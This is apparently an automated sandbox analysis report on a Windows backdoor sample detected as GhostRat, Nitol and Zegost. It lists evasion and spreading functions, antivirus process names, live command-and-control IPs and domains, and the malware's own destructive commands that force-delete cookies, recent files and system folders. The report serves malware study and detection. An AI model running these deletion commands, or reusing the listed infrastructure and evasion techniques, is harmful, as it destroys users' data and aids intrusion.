Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: .exe.0.dr	Binary or memory string: 00-05-69 VMWARE, Inc.
Source: .exe, 00000005.00000003.1360796714.0000000002456000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00-1C-14 VMware, IncG
Source: svchost.exe, 00000008.00000002.2651704250.000000000084C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: v5.exe, 00000002.00000002.1330252488.000000000076D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\v5.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Temp\server.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F3A0 BlockInput,BlockInput,

3_2_1000F3A0

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Temp\server.exe

3_2_100018A0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405CFF

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,

3_2_00401000

Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044F257 SetUnhandledExceptionFilter,		5_2_0044F257
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044F26B SetUnhandledExceptionFilter,		5_2_0044F26B

Contains functionality to simulate keystroke presses

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,

3_2_1000F840

Contains functionality to simulate mouse events

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,

3_2_1000F840

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"

Source: C:\Windows\Temp\ .exe

Code function: 5_2_00401680 AllocateAndInitializeSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeAcl,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,GetProcessHeap,GetProcessHeap,HeapFree,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,FreeSid,

5_2_00401680

Source: C:\Windows\Temp\ .exe

5_2_00401680

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10025DC0 cpuid

3_2_10025DC0

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Temp\ .exe	Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,	5_2_0045F814
Source: C:\Windows\Temp\ .exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	5_2_00401060
Source: C:\Windows\Temp\ .exe	Code function: GetLocaleInfoA,	5_2_00451400

Queries the installation date of Windows

Source: C:\Windows\Temp\ .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Temp\ .exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_00402AD0 LoadLibraryA,LoadLibraryA,6D0C6DE0,6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,memset,lstrcmp,sprintf,sprintf,sprintf,Sleep,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep,

2_2_00402AD0

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10007070 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,

3_2_10007070

Source: C:\Windows\Temp\ .exe

Code function: 5_2_00433020 SendMessageA,SendMessageA,RegQueryValueExA,SystemTimeToVariantTime,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetTimeZoneInformation,SendMessageA,SendMessageA,SendMessageA,SendMessageA,RegOpenKeyExA,SendMessageA,SendMessageA,

5_2_00433020

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_004059FF

AV process strings found (often used to terminate AV products)

Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY

Yara detected Nitol

Source: Yara match	File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY

Yara detected Nitol

Source: Yara match	File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
120.48.34.233	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	true
8.7.198.46	chinagov.8800.org	United States	14567	SPRINGSUS	true
46.82.174.69	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	true

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
chinagov.8800.org	8.7.198.46	true
www.af0575.com	unknown	unknown
www.wk1888.com	unknown	unknown
www.fz0575.com	unknown	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: G3izWAY3Fa.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\034031\svchost.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\033726\RCX773C.tmp	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\server.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\v5.exe	Avira: detection malicious, Label: TR/Staser.apzjs
Source: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Avira: detection malicious, Label: BDS/Zegost.birna

Multi AV Scanner detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\server.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\v5.exe	ReversingLabs: Detection: 100%
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: G3izWAY3Fa.exe	Virustotal: Detection: 70%			Perma Link
Source: G3izWAY3Fa.exe	ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Machine Learning detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\034031\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Joe Sandbox ML: detected
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\033726\RCX773C.tmp	Joe Sandbox ML: detected
Source: C:\Windows\Temp\server.exe	Joe Sandbox ML: detected
Source: C:\Windows\Temp\v5.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Joe Sandbox ML: detected

Uses 32bit PE files

Source: G3izWAY3Fa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp

Spreading

Contains functionality to enumerate network shares of other devices

Source: C:\Windows\Temp\v5.exe

4_2_00402AD0

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405CD8 FindFirstFileA,FindClose,	0_2_00405CD8
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	3_2_10001A20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	3_2_100014B0
